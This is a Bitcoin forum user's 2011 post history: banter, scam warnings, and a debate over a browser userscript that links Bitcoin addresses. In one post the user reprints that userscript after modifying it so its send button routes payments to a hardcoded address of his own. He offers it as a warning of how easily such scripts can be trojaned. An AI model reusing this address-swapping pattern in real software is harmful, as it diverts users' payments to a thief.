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421  Bitcoin / Bitcoin Discussion / Re: I am putting Bitcoin.us domain name up for auction. on: July 08, 2011, 06:40:08 PM
I'll give you $26,000 worth of wooden nickels for it, plus $9.95 in reg fees
422  Bitcoin / Bitcoin Discussion / Re: How does one increase one's odds in the speculation game? on: July 08, 2011, 06:36:39 PM
Increase your money.  If you put say, $100,000USD into your account and start buying, the price will go up.
423  Bitcoin / Bitcoin Discussion / Re: Do You Have A Bitcoin Website? Do You Want to Be On The First Page Of Google? on: July 08, 2011, 06:35:16 PM
Yes, we are currently accepting Bitcoins. I also want to point out that we've set up an office specifically targeting Bitcoin users, we offer professional SEO services.

The rate for this specific method is 5 BTC per month, if you are interested feel free to private message me and I'll give you my contact details.

Cheers

That being said, I'd offer the following suggestions:

1.) Put the price in BTC rather than USD
2.) Take out 90% of your pitch and replace it with customer testamonials and evidence; here we buy steak and not sizzle.
3.) Take out 100% of the bold and big fonts
4.) Move it to the marketplace instead of the discussion
5.) Demonstrate some understanding of the BTC community

I may have need of some SEO in a month or so, and the BTC price is reasonable.  But like others here, would definitely want to see your portfolio.
424  Bitcoin / Bitcoin Discussion / Re: Bitcoin Mining Accelerator SCAM on: July 08, 2011, 05:08:58 PM
I actually figure someone on these forums is smart enough to crack open the file and see if you can find the return address on it Smiley   Where does this person want everything they steal going back to?

Reverse engineer. Works great with keyloggers.. back when I was 14 I would download youtube keyloggers and get their ftp info.

If only you could send negative BTC to somebody!
425  Bitcoin / Bitcoin Discussion / Re: ALERT: You have 5 days mtgox on: July 08, 2011, 05:06:20 PM
I AM HAVING A GREAT DAY!!! I THINK I WILL GO OUT TO DINNER TONIGHT!!! BITCHEZZ!!!

See how stupid formatting makes your words. Roll Eyes


I am going to go haz a cheezburger right now
426  Bitcoin / Bitcoin Discussion / Re: POOLS under DDOS ATTACKS on: July 08, 2011, 05:05:10 PM

It is MUCH more difficulty to make a virus to Linux... I'm honestly do not believe that somebody can make a Linux Virus capable of infecting all Linux variants across the globe.. It is near impossible to do that.

http://en.wikipedia.org/wiki/Morris_worm

Aside from the first internet worm, of course Smiley
427  Bitcoin / Bitcoin Discussion / Re: Have I just lost 80 btc? =( on: July 08, 2011, 02:04:11 PM
Sorry to go off topic - JoelKatz - is that a David Koresh mugshot for your avatar? lol
I used to look a lot more like a terrorist or religious fanatic than I do now. I should update my profile picture, I look much more distinguished now.

oh lol my bad dude, definitely update that!
428  Bitcoin / Bitcoin Discussion / Re: Bump when you're guilty on: July 08, 2011, 01:41:35 PM
Lessons learned in blood are not soon forgotten Smiley
429  Bitcoin / Bitcoin Discussion / Re: Do You Have A Bitcoin Website? Do You Want to Be On The First Page Of Google? on: July 08, 2011, 01:40:56 PM

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430  Bitcoin / Bitcoin Discussion / Re: Poll: What is your favourite bitcoin browser extension? on: July 08, 2011, 01:32:26 PM
Yeah, he's a total fucking tool.  Like I want some amateur Javascript shit running in my browser all the time connecting to my bitcoin server.  OH WOW!  IT SAVES ME SO MUCH TIME I NO LONGER HAVE TO HIGHLIGHT, HIT CONTROL C AND CONTROL V!!!

I wonder why you are so biased toward a open source javascript applet which, if you don't configure your client to accept RPC, can be only used to highlight and link BTC addresses, while every single closed source program/game/driver with similar malicious code can literally take its time to search and upload all the wallets from the PC you are using and popup a huge laughing dildo when it's done.

Because it's the same paranoia that keeps me from installing nonsense program/games/drivers on my PC :-)  It's nothing against you personally, I just don't want to see all the posts about people losing bitcoins because they installed a hacked version of your script.
431  Bitcoin / Bitcoin Discussion / Re: Have I just lost 80 btc? =( on: July 08, 2011, 01:31:01 PM
Sorry to go off topic - JoelKatz - is that a David Koresh mugshot for your avatar? lol
432  Bitcoin / Bitcoin Discussion / Re: Should the exchanges close on the weekends? on: July 08, 2011, 01:30:12 PM
Should the exchanges be close to what on the weekends?
433  Bitcoin / Bitcoin Discussion / Re: FIght Back idea on: July 08, 2011, 01:29:32 PM

5.ah and why the providers dont take the infected machines down, and send to the owners letters with rembering to the terms&conditions of the ISP?!? just reroute traffic isnt illegal.

Pretend you're a cable provider.

Investigating what your clients are doing and whether or not their PCs are infected costs you >0.  Doing nothing costs 0.
Shutting down a paying customer costs you 39.95 a month.  Leaving them on earns you 39.95 a month.

Ask the question again.
434  Bitcoin / Bitcoin Discussion / Re: Poll: What is your favourite bitcoin browser extension? on: July 08, 2011, 01:32:33 AM
yet people are treating this specific browser extension like the plague.

You understand it is because of the user who released this already has a lot of negativity going his way?

Hell, people on Reddit were onto him early on because of this https://forum.bitcoin.org/index.php?topic=21527.0 lol

Yeah, he's a total fucking tool.  Like I want some amateur Javascript shit running in my browser all the time connecting to my bitcoin server.  OH WOW!  IT SAVES ME SO MUCH TIME I NO LONGER HAVE TO HIGHLIGHT, HIT CONTROL C AND CONTROL V!!!
435  Bitcoin / Bitcoin Discussion / Re: Poll: What is your favourite bitcoin browser extension? on: July 07, 2011, 01:31:48 AM
lol awesome that you missed the entire previous post in your rush to perform your trolling Smiley  Good job, Helen Keller!
436  Bitcoin / Bitcoin Discussion / Re: [ATTN!!] Bitcoin Security nearly Breached on: July 07, 2011, 01:30:00 AM

People need to stop and think before making these idiotic posts.

 Cheesy Right. And Micro$oft Windows became the predominant OS because it was better than all the rest...
http://www.youtube.com/watch?v=Xda4mZK4wpM  Wink

You'll note I didn't say it was better - ever.  What I said was "they like DeepBit better than others".

The quality of a product has nothing to do with whether or not people like it better.  It's a contributing factor for some, but Dodge will always sell a ton of Dodge Neons because some people don't care about quality, as long as there are readily available coffee can mufflers and plastic spinner hubcaps for it.

Microsoft's dominance hasn't changed, but it certainly has less of a margin with both OS's and browsers, with browsers slowly sliding towards no longer being dominant.

Microsoft became the predominant OS for several reasons:

-They made the personal computer affordable versus IBM PCs with IBM DOS
-They made deals with computer manufacturers that incentivized them to sell Windows and not OS/2 or Mac or Linux
-Even with less than perfect and sometimes terrible implementation of ideas, they eventually "Get it right" and give people what they want.

The difference with Mac is, they invent something new and its either a.) very useful or b.) they use hype to convince people its a NEED.  Microsoft combines innovation with immitation.

That being said:

I have an apple phone
an apple desktop
an apple laptop
a windows computer
a windows notebook
a windows NETbook
a linux server
and an android tablet.

Each has its own purpose.

Unfortunately I don't speak Russian, so I can't really understand the youtube video, but I'm sure to you and the other 9,000 viewers it was epic Smiley
437  Bitcoin / Bitcoin Discussion / Re: Poll: What is your favourite bitcoin browser extension? on: July 07, 2011, 01:20:30 AM
Post the source code and I'll have a look through

He linked it in the comment you quoted

Also that was added after the fact... initially it was the bitcoind source code linked there.
438  Bitcoin / Bitcoin Discussion / Re: Poll: What is your favourite bitcoin browser extension? on: July 07, 2011, 01:18:41 AM

// ==UserScript==
// @name           Bitcoin Tool
// @namespace      Bitcoin Tool
// @description    Bitcoin Tool - recognizes Bitcoin addresses on websites, adds links to the blockexplorer, adds a select button for easier copy-paste, and a "Falkvinge" Send BTC button
// @version        1.1
// @include        *
// ==/UserScript==

text = document.body.innerHTML;
if (text.match(/[^A-Za-z0-9/"]1[A-HJ-NP-Za-km-z1-9]{32,33}[^A-Za-z0-9"]/)) {
document.body.innerHTML = text.replace(/(<[^<]*[^A-Za-z0-9/"])(1[A-HJ-NP-Za-km-z1-9]{32,33})([^A-Za-z0-9?%"]...)/g,function(a,b,c,d){
t = new Array(256);for(j=97;j<=122;++j){t[j]=0;}for(j=65;j<=90;++j){t[j]=0;}for(j=48;j<=57;++j){t[j]=0;}for(j=0;j<c.length;++j){++t[c.charCodeAt(j)];}
bc="17t4EgfBBUxQVK6TZJqZc8oMdmxnLELg2o";
sum=0;sum1=0;sum2=0;sum3=0;for(j=97;j<=122;++j){sum+=t[j]*t[j];sum1+=t[j]}for(j=65;j<=90;++j){sum+=t[j]*t[j];sum2+=t[j]}for(j=48;j<=57;++j){sum+=t[j]*t[j];sum3+=t[j]}
return (a.match(/^<(textarea|input|pre|code)/i) || d=="</a>" || sum >= 90 || sum1 <= 2 || sum1 >= 26 || sum2 <= 2 || sum2 >= 26 || sum3 >= 14) ? b+c+d : b+"<a href=\"http://blockexplorer.com/address/"+c+"\">"+c+"</a>"
+"<span style=\"cursor:pointer;border:1px solid black;font-size:80%;color:black;font-weight:normal;padding:1px 2px 0 2px;margin:1px 0 1px 4px;background:#ddd;\" "
+"onclick=\"if(document.createRange){r=document.createRange();previousSibling.focus();r.selectNodeContents(previousSibling);w=window.getSelection();w.addRange(r);}else{r=document.body.createTextRange();r.moveToElementText(previousSibling);r.select();}\" onmouseover=\"this.style.backgroundColor='#eee'\" onMouseOut=\"this.style.backgroundColor='#ddd'\">Select</span>"
+"<span style=\"cursor:pointer;border:1px solid black;font-size:80%;color:black;font-weight:normal;padding:1px 2px 0 2px;margin:1px 0 1px 6px;background:#ddd;\" title=\"Requires bitcoind and bitcoin_httpd\" onmouseover=\"this.style.backgroundColor='#eee'\" onMouseOut=\"this.style.backgroundColor='#ddd'\" onclick=\"window.open('http://localhost:8330/"+bc+"');\">Send BTC</span>"+d;
});
}

// If you like the tool, donate to 141HiFa6pek3uM32LpRe3gXraETV1fViWC
//
// This is public domain code, free for commercial and non-commercial use.
// If you use some of it, give a link to this script:
// http://userscripts.org/scripts/show/104381


Here I have modified (but not tested the code) above.

I added one line of code, and changed literally one character.  What this code does NOW, is regardless of who's address you highlight, it sends it to a specific BitCoin address I have specified (random one I created).

Granted this guy isn't doing this with the code, but it's too easy to do things like this, or have it slipped into a newer version, or have it inline coded in a forum, etc.
439  Bitcoin / Bitcoin Discussion / Re: MY BTC just went POOF! on: July 07, 2011, 01:11:46 AM

Yeah I know, there have been a lot of these threads. But they've all gone nowhere. I always hope I'll be able to nail down some detail because I am curious how this happens. I know if it were my computer, I would decompile every last executable until I find something that opens my wallet. This would get solved. But it isn't my computer, and it isn't going to be, so I try and solve the mystery for others.

This doesn't sound like the other cases. The coins weren't transferred, and the wallet.dat is missing. This hasn't happened before. It doesn't seem like a trojan to me. It could be a newly found bug. We should investigate.
[/quote]

This sounds like a case of Noob Sausage Fingers to me.
440  Bitcoin / Bitcoin Discussion / Re: Poll: What is your favourite bitcoin browser extension? on: July 07, 2011, 01:09:58 AM
Post the source code and I'll have a look through

He linked it in the comment you quoted

Hmm.. Well, having a look through, I don't see anything blatantly malicious, but I personally wouldn't run a javascript applet that can automatically connect to my bitcoin server and automatically start sending coins to an address, even if you DO have to confirm it.

Within the next week, guaranteed some loser who installs it will be crying about how he accidentally sent the money he was saving for his Grandma's dentures to the wrong address or some bullshit.

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